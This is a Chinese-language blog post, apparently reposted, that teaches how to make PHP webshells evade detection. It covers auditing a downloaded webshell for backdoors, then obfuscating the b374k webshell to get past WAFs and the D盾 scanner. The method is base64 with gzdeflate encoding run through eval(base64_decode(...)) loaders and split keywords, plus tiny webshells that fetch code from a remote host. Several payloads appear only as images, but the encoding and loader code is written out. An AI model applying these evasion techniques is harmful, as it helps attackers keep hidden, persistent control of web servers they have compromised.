PHP免杀大马的奇淫技巧

栏目: PHP · 发布时间: 6年前

内容简介:本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!常见

本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!

Part 1

常见 PHP 大马 :

PHP免杀大马的奇淫技巧

PHP免杀大马的奇淫技巧

Part 2

大马后门检查: Fiddler 抓包

PHP免杀大马的奇淫技巧

审计代码

这里我以 http://webshell8.com/ 这里的大马为例子演示

修改并运行脚本 PHP免杀大马的奇淫技巧

Burp 抓包或者右键查看原代码 PHP免杀大马的奇淫技巧

修改并运行代码 PHP免杀大马的奇淫技巧

再使用 Burp 抓个包 PHP免杀大马的奇淫技巧

查找关键字 GetHtml hmlogin localhost PHP免杀大马的奇淫技巧

把上图的 base64 代码解密下 PHP免杀大马的奇淫技巧

Part 3

大马源码免杀

这里我使用的是国外的一款大马 b374k 来进行免杀。 PHP免杀大马的奇淫技巧

执行代码 eval preg_replace的/e修饰符 来执行大马代码。 PHP免杀大马的奇淫技巧

$a = 'phpinfo();';
eval($a);
//eval执行 php 代码

编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。 PHP免杀大马的奇淫技巧

$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

在线加解密码 点这里

这里我先将b374k的源码去掉 <?php ?> 后, base64 加密 PHP免杀大马的奇淫技巧

解码

通过解码执行我们的代码。 PHP免杀大马的奇淫技巧

那我们来试试解码并执行刚刚base64加密的大马。

<?php
eval(base64_decode('刚刚加密的代码'));
?>

PHP免杀大马的奇淫技巧

关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(base64_decode('code'));
// 我们需要做的就是关键字免杀

免杀 payload 1 过狗过D盾 注意: code 就是我们刚刚 加密的base64 代码。 PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

D盾规则库 PHP免杀大马的奇淫技巧

免杀 payload 2 PHP免杀大马的奇淫技巧 PHP免杀大马的奇淫技巧

总结,源码免杀就到这里了,其实只需要些php基础,轻松免杀。

Part 4

只有几百字节的大马

首先我们需要了解,几百字节是什么概念 1kb = 1024b PHP免杀大马的奇淫技巧

那么我们怎么实现呢,2种思路 远程读取 远程下载 PHP免杀大马的奇淫技巧

远程读取 payload 3 PHP免杀大马的奇淫技巧

上传txt PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

payload 4 PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

远程下载 payload 5 PHP免杀大马的奇淫技巧

免杀 PHP免杀大马的奇淫技巧

大小 最小的一百多字节,其他2个两百多字节那样子。

喜欢这篇文章的话就点一点 喜欢 吧!


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

注意力商人

注意力商人

吳修銘 / 黃庭敏 / 天下雜誌 / 2018-4-2 / NT$650

電子郵件,免費!照片分享,無上限! 你是否想過,隨手可得的免費內容、便利的免費服務,到底都是誰在付費? 如果商品免費,那你就不是消費者,而是商品! 你我可能都不知不覺地把自己賣給了注意力商人! 「『媒體轉型、網路演化與資訊浪潮」此一主題最具洞見的作者。』──黃哲斌(資深媒體人) 「這是少有的關注產業發展的傳播史,對現在或未來的『注意力產業』」中人來說,不可不讀。」──......一起来看看 《注意力商人》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

随机密码生成器
随机密码生成器

多种字符组合密码

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具